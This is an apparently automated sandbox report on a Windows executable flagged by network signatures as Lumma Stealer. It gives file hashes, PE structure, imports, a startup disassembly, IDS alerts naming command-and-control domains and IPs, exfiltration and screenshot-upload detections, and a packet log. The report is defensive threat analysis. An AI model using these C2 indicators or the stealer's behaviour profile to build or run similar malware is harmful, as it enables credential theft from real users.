                                                                                                                                                                                                                                      SSDEEP:96:5y86xthF7VlBOWAIb1uPAi73tJA2Cfa2vEqqwpHfXH1FjVtm9WIkWIXpyPUSbXno:DkPjY4O0faHwpPVFjaKycgdxlGtD
                                                                                                                                                                                                                                      MD5:12BAA5BD292789373C90EB13EA5FE6B0
                                                                                                                                                                                                                                      SHA1:35572BCB72F70991FAE0D4F19275920BC5FD7C03
                                                                                                                                                                                                                                      SHA-256:4231C96D251833CE874944CE87E88323F2AE9CA93073A537A3E0931AF3065332
                                                                                                                                                                                                                                      SHA-512:C06F3AED42ADE8B97EF0ECBB10C05F47FFE5C17100E95DE800457DA45FDBA20BF47ACF8F357362BDC16FBD8C5EF8A7E591B4C79DC4F83C49405411CAD63B112E
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                      Preview:MDMP..a..... ........bg........................X...............V...........T.......8...........T.......................................................................................................................eJ......x.......GenuineIntel............T............bg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):8398
                                                                                                                                                                                                                                      Entropy (8bit):3.695799866533208
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:R6l7wVeJYA6N6YEIzSU9h5gmfuLprZ89bRIsfx7m:R6lXJf6N6YE8SU9h5gmfuQR7fQ
                                                                                                                                                                                                                                      MD5:34D98837F40FF2601F5E7804747D4EDF
                                                                                                                                                                                                                                      SHA1:751C2D0BE1F744E57E1FE00637B4DE3295E8694D
                                                                                                                                                                                                                                      SHA-256:E5F1D088EF74A8CB25E5B2E3D1F9C0582490D9B78C1B7328E1454E087AF299D5
                                                                                                                                                                                                                                      SHA-512:D0B7A059F043416866FE2940B90D17904D5F7B8ABACE2119E082700492114E8B333D29780BB7E90AE8FCF4557DD705888CEA0726F483F06624C44305959E56F9
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.3.6.8.<./.P.i.
                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):4710
                                                                                                                                                                                                                                      Entropy (8bit):4.472200421843337
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:48:cvIwWl8zsAJg77aI9LIWpW8VYJvYm8M4J+NJF6+q8vjNVB+oY7PtTd:uIjfGI7th7V6yJ+8KjPBoPtTd
                                                                                                                                                                                                                                      MD5:F2AAAEC6A713FC3B9CD640B34C97BAE0
                                                                                                                                                                                                                                      SHA1:8A74F03E8D3574192A3BD3A3444E0380E2E17650
                                                                                                                                                                                                                                      SHA-256:D7F642434C00DFF86ECA0F48FEA6158B394F79CE35233BB9BFB34E11EE88BDB5
                                                                                                                                                                                                                                      SHA-512:4CAC0A4502C46448F422B24DC1A0FDBA50BC9289000D82E893B489B10B5CD600E3F7350C448597DE27987A1CDA56C703B3CB9D03451FA6073094385B6A8B82DD
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="636575" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1835008
                                                                                                                                                                                                                                      Entropy (8bit):4.421535180639867
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:6144:xSvfpi6ceLP/9skLmb0OTtWSPHaJG8nAgeMZMMhA2fX4WABlEnN90uhiTw:IvloTtW+EZMM6DFyn03w
                                                                                                                                                                                                                                      MD5:3AF9FBCD6F6C5AC3B2C427481A99153A
                                                                                                                                                                                                                                      SHA1:F01BACC0044521ECAA761E99BABA111CB6CA0EA5
                                                                                                                                                                                                                                      SHA-256:3712A3C59BA4657945877C1B83B4FE38565A8E54385162D32C30CB00EA97EC6E
                                                                                                                                                                                                                                      SHA-512:AE2811618AA9ECB6F4BA4B878240722CBAFBA40291DD44AAA8B58DF1D2517C72A4C5F9C904F3402D2C85998F85C3FB61D8178164DB56BDAD45D646E79FFB25C8
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                      Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.48Q..............................................................................................................................................................................................................................................................................................................................................p1..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\1fxm3u0d.exe
                                                                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:U:U
                                                                                                                                                                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:high, very likely benign file
                                                                                                                                                                                                                                      Preview:1
                                                                                                                                                                                                                                      File type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                      Entropy (8bit):7.599614813633723
                                                                                                                                                                                                                                      TrID:
                                                                                                                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                      File name:1fxm3u0d.exe
                                                                                                                                                                                                                                      File size:644'096 bytes
                                                                                                                                                                                                                                      MD5:2ca092d4c58d496d25e1238185d31b6e
                                                                                                                                                                                                                                      SHA1:e06646a559cd47d169926ed515644d4ca78feec2
                                                                                                                                                                                                                                      SHA256:cd84eee729821ff54b7a766713b7b582005c91e34f7ca9f77e7dc121e14f6493
                                                                                                                                                                                                                                      SHA512:c81df55c728970a4c52309a1e610eb9d90e0715279000944c228acf44ef329a00413e42272274daffc69eecabc50a36a25679e53521c77fff5c2005286684595
                                                                                                                                                                                                                                      SSDEEP:12288:MC1YMNbTFoj0EBZxJFW2alZeBFJ+eIwxFiyzq3LOgPRIzBvPZTHpZlsL3nN:tvNbTWj0AZxq2aiBHPXIOSdRIzVxLpHO
                                                                                                                                                                                                                                      TLSH:4AD4D101B5C2D0B2F56720311764E73B293DB9618729CEEFD3E46B3E5A207C09A35B5A
                                                                                                                                                                                                                                      File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....5&g..........................................@..........................@............@.....................................<..
                                                                                                                                                                                                                                      Icon Hash:00928e8e8686b000
                                                                                                                                                                                                                                      Entrypoint:0x421e90
                                                                                                                                                                                                                                      Entrypoint Section:.text
                                                                                                                                                                                                                                      Digitally signed:false
                                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                                      Subsystem:windows cui
                                                                                                                                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                      Time Stamp:0x67263502 [Sat Nov 2 14:19:46 2024 UTC]
                                                                                                                                                                                                                                      TLS Callbacks:
                                                                                                                                                                                                                                      CLR (.Net) Version:
                                                                                                                                                                                                                                      OS Version Major:6
                                                                                                                                                                                                                                      OS Version Minor:0
                                                                                                                                                                                                                                      File Version Major:6
                                                                                                                                                                                                                                      File Version Minor:0
                                                                                                                                                                                                                                      Subsystem Version Major:6
                                                                                                                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                                                                                                                      Import Hash:5061395a3e61942b18ff54c3c1c9037d
                                                                                                                                                                                                                                      Instruction
                                                                                                                                                                                                                                      call 00007F129CE05A6Ah
                                                                                                                                                                                                                                      jmp 00007F129CE058CDh
                                                                                                                                                                                                                                      mov ecx, dword ptr [0044E82Ch]
                                                                                                                                                                                                                                      push esi
                                                                                                                                                                                                                                      push edi
                                                                                                                                                                                                                                      mov edi, BB40E64Eh
                                                                                                                                                                                                                                      mov esi, FFFF0000h
                                                                                                                                                                                                                                      cmp ecx, edi
                                                                                                                                                                                                                                      je 00007F129CE05A66h
                                                                                                                                                                                                                                      test esi, ecx
                                                                                                                                                                                                                                      jne 00007F129CE05A88h
                                                                                                                                                                                                                                      call 00007F129CE05A91h
                                                                                                                                                                                                                                      mov ecx, eax
                                                                                                                                                                                                                                      cmp ecx, edi
                                                                                                                                                                                                                                      jne 00007F129CE05A69h
                                                                                                                                                                                                                                      mov ecx, BB40E64Fh
                                                                                                                                                                                                                                      jmp 00007F129CE05A70h
                                                                                                                                                                                                                                      test esi, ecx
                                                                                                                                                                                                                                      jne 00007F129CE05A6Ch
                                                                                                                                                                                                                                      or eax, 00004711h
                                                                                                                                                                                                                                      shl eax, 10h
                                                                                                                                                                                                                                      or ecx, eax
                                                                                                                                                                                                                                      mov dword ptr [0044E82Ch], ecx
                                                                                                                                                                                                                                      not ecx
                                                                                                                                                                                                                                      pop edi
                                                                                                                                                                                                                                      mov dword ptr [0044E828h], ecx
                                                                                                                                                                                                                                      pop esi
                                                                                                                                                                                                                                      ret
                                                                                                                                                                                                                                      push ebp
                                                                                                                                                                                                                                      mov ebp, esp
                                                                                                                                                                                                                                      sub esp, 14h
                                                                                                                                                                                                                                      and dword ptr [ebp-0Ch], 00000000h
                                                                                                                                                                                                                                      lea eax, dword ptr [ebp-0Ch]
                                                                                                                                                                                                                                      and dword ptr [ebp-08h], 00000000h
                                                                                                                                                                                                                                      push eax
                                                                                                                                                                                                                                      call dword ptr [0044C8DCh]
                                                                                                                                                                                                                                      mov eax, dword ptr [ebp-08h]
                                                                                                                                                                                                                                      xor eax, dword ptr [ebp-0Ch]
                                                                                                                                                                                                                                      mov dword ptr [ebp-04h], eax
                                                                                                                                                                                                                                      call dword ptr [0044C898h]
                                                                                                                                                                                                                                      xor dword ptr [ebp-04h], eax
                                                                                                                                                                                                                                      call dword ptr [0044C894h]
                                                                                                                                                                                                                                      xor dword ptr [ebp-04h], eax
                                                                                                                                                                                                                                      lea eax, dword ptr [ebp-14h]
                                                                                                                                                                                                                                      push eax
                                                                                                                                                                                                                                      call dword ptr [0044C924h]
                                                                                                                                                                                                                                      mov eax, dword ptr [ebp-10h]
                                                                                                                                                                                                                                      lea ecx, dword ptr [ebp-04h]
                                                                                                                                                                                                                                      xor eax, dword ptr [ebp-14h]
                                                                                                                                                                                                                                      xor eax, dword ptr [ebp-04h]
                                                                                                                                                                                                                                      xor eax, ecx
                                                                                                                                                                                                                                      leave
                                                                                                                                                                                                                                      ret
                                                                                                                                                                                                                                      mov eax, 00004000h
                                                                                                                                                                                                                                      ret
                                                                                                                                                                                                                                      push 00450988h
                                                                                                                                                                                                                                      call dword ptr [0044C8FCh]
                                                                                                                                                                                                                                      ret
                                                                                                                                                                                                                                      push 00030000h
                                                                                                                                                                                                                                      push 00010000h
                                                                                                                                                                                                                                      push 00000000h
                                                                                                                                                                                                                                      call 00007F129CE0D613h
                                                                                                                                                                                                                                      add esp, 0Ch
                                                                                                                                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x4c6a00x3c.rdata
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x540000x2438.reloc
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x485600x18.rdata
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x40f700xc0.rdata
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x4c8340x158.rdata
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                      .text0x10000x3ef5a0x3f000ce0e6988bab73ebaec1c4df67868e8a8False0.5620659722222222data6.952656508969145IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                      .rdata0x400000xdb940xdc00931f151ac4ff36a590b0f3a8a8bc53b7False0.5108132102272728data5.554667502069597IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                      .data0x4e0000x31540x16005edc4d0030d5f354693fb90190e590aeFalse0.4089133522727273data4.768821879151084IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                      .bss0x520000x80x2006558dc8e53d1da1a60092fcc73822e86False0.03125data0.06116285224115448IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                      .tls0x530000x90x2001f354d76203061bfdd5a53dae48d5435False0.033203125data0.020393135236084953IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                      .reloc0x540000x24380x2600b7c6d007117394778142a1bfa572d3a0False0.7362253289473685data6.500264772704368IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                      .right0x570000x4b2000x4c2001f7d884afaa7e5396ea4a75b8761bb3eFalse1.0003399527914614data7.999467185140214IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                      DLLImport
                                                                                                                                                                                                                                      KERNEL32.dllCloseHandle, CompareStringW, CreateEventW, CreateFileW, DecodePointer, DeleteAtom, DeleteCriticalSection, EncodePointer, EnterCriticalSection, EnumSystemLocalesW, ExitProcess, FindClose, FindFirstFileExW, FindNextFileW, FlushFileBuffers, FreeEnvironmentStringsW, FreeLibrary, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStringsW, GetExitCodeThread, GetFileSizeEx, GetFileType, GetLastError, GetLocaleInfoW, GetModuleFileNameW, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemFileCacheSize, GetSystemTimeAsFileTime, GetUserDefaultLCID, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitializeCriticalSectionAndSpinCount, InitializeCriticalSectionEx, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, IsValidLocale, LCMapStringEx, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, MultiByteToWideChar, QueryPerformanceCounter, RaiseException, ReadConsoleW, ReadFile, ResetEvent, RtlUnwind, SetEndOfFile, SetEnvironmentVariableW, SetEvent, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, UnhandledExceptionFilter, WaitForSingleObjectEx, WideCharToMultiByte, WriteConsoleW, WriteFile
                                                                                                                                                                                                                                      USER32.dllTranslateMessage
                                                                                                                                                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                      2024-12-18T11:32:58.450789+01002057097ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thighpecr .cyou)1192.168.2.5566951.1.1.153UDP
                                                                                                                                                                                                                                      2024-12-18T11:32:58.679311+01002057093ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (seallysl .site)1192.168.2.5558111.1.1.153UDP
                                                                                                                                                                                                                                      2024-12-18T11:32:58.902357+01002057089ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (opposezmny .site)1192.168.2.5541621.1.1.153UDP
                                                                                                                                                                                                                                      2024-12-18T11:32:59.131332+01002057085ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (goalyfeastz .site)1192.168.2.5515381.1.1.153UDP
                                                                                                                                                                                                                                      2024-12-18T11:32:59.349775+01002057077ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (contemteny .site)1192.168.2.5595481.1.1.153UDP
                                                                                                                                                                                                                                      2024-12-18T11:32:59.578043+01002057079ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dilemmadu .site)1192.168.2.5642271.1.1.153UDP
                                                                                                                                                                                                                                      2024-12-18T11:32:59.810077+01002057083ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (faulteyotk .site)1192.168.2.5653731.1.1.153UDP
                                                                                                                                                                                                                                      2024-12-18T11:33:00.036959+01002057071ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (authorisev .site)1192.168.2.5495461.1.1.153UDP
                                                                                                                                                                                                                                      2024-12-18T11:33:00.354666+01002057095ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (servicedny .site)1192.168.2.5551201.1.1.153UDP
                                                                                                                                                                                                                                      2024-12-18T11:33:02.147349+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.54970523.55.153.106443TCP
                                                                                                                                                                                                                                      2024-12-18T11:33:02.959840+01002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.54970523.55.153.106443TCP
                                                                                                                                                                                                                                      2024-12-18T11:33:04.632141+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549708104.21.66.86443TCP
                                                                                                                                                                                                                                      2024-12-18T11:33:08.830259+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549708104.21.66.86443TCP
                                                                                                                                                                                                                                      2024-12-18T11:33:08.830259+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549708104.21.66.86443TCP
                                                                                                                                                                                                                                      2024-12-18T11:33:10.402197+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549712104.21.66.86443TCP
                                                                                                                                                                                                                                      2024-12-18T11:33:11.438395+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.549712104.21.66.86443TCP
                                                                                                                                                                                                                                      2024-12-18T11:33:11.438395+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549712104.21.66.86443TCP
                                                                                                                                                                                                                                      2024-12-18T11:33:12.986476+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549713104.21.66.86443TCP
                                                                                                                                                                                                                                      2024-12-18T11:33:16.870175+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549718104.21.66.86443TCP
                                                                                                                                                                                                                                      2024-12-18T11:33:18.117298+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.549718104.21.66.86443TCP
                                                                                                                                                                                                                                      2024-12-18T11:33:19.509209+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549724104.21.66.86443TCP
                                                                                                                                                                                                                                      2024-12-18T11:33:21.982900+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549731104.21.66.86443TCP
                                                                                                                                                                                                                                      2024-12-18T11:33:24.402351+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549738104.21.66.86443TCP
                                                                                                                                                                                                                                      2024-12-18T11:33:24.406261+01002843864ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M21192.168.2.549738104.21.66.86443TCP
                                                                                                                                                                                                                                      2024-12-18T11:33:30.409861+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549758104.21.66.86443TCP
                                                                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:00.743968964 CET49705443192.168.2.523.55.153.106
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:00.744033098 CET4434970523.55.153.106192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:00.744225979 CET49705443192.168.2.523.55.153.106
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:00.757998943 CET49705443192.168.2.523.55.153.106
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:00.758022070 CET4434970523.55.153.106192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:02.147088051 CET4434970523.55.153.106192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:02.147349119 CET49705443192.168.2.523.55.153.106
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:02.150105953 CET49705443192.168.2.523.55.153.106
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:02.150126934 CET4434970523.55.153.106192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:02.150396109 CET4434970523.55.153.106192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:02.190675974 CET49705443192.168.2.523.55.153.106
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:02.192313910 CET49705443192.168.2.523.55.153.106
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:02.239346027 CET4434970523.55.153.106192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:02.959894896 CET4434970523.55.153.106192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:02.959925890 CET4434970523.55.153.106192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:02.959956884 CET4434970523.55.153.106192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:02.959975004 CET4434970523.55.153.106192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:02.959992886 CET4434970523.55.153.106192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:02.960186958 CET49705443192.168.2.523.55.153.106
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:02.960186958 CET49705443192.168.2.523.55.153.106
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:02.960222960 CET4434970523.55.153.106192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:02.960311890 CET49705443192.168.2.523.55.153.106
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:03.127866030 CET4434970523.55.153.106192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:03.127924919 CET4434970523.55.153.106192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:03.128038883 CET49705443192.168.2.523.55.153.106
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:03.128104925 CET4434970523.55.153.106192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:03.128249884 CET49705443192.168.2.523.55.153.106
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:03.158780098 CET4434970523.55.153.106192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:03.158843040 CET4434970523.55.153.106192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:03.158874035 CET4434970523.55.153.106192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:03.158970118 CET49705443192.168.2.523.55.153.106
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:03.159038067 CET49705443192.168.2.523.55.153.106
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:03.234318018 CET49705443192.168.2.523.55.153.106
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:03.234357119 CET4434970523.55.153.106192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:03.234379053 CET49705443192.168.2.523.55.153.106
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:03.234388113 CET4434970523.55.153.106192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:03.400643110 CET49708443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:03.400702953 CET44349708104.21.66.86192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:03.400876999 CET49708443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:03.401161909 CET49708443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:03.401171923 CET44349708104.21.66.86192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:04.632055044 CET44349708104.21.66.86192.168.2.5
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:04.632141113 CET49708443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                      Dec 18, 2024 11:33:04.635747910 CET49708443192.168.2.5104.21.66.86
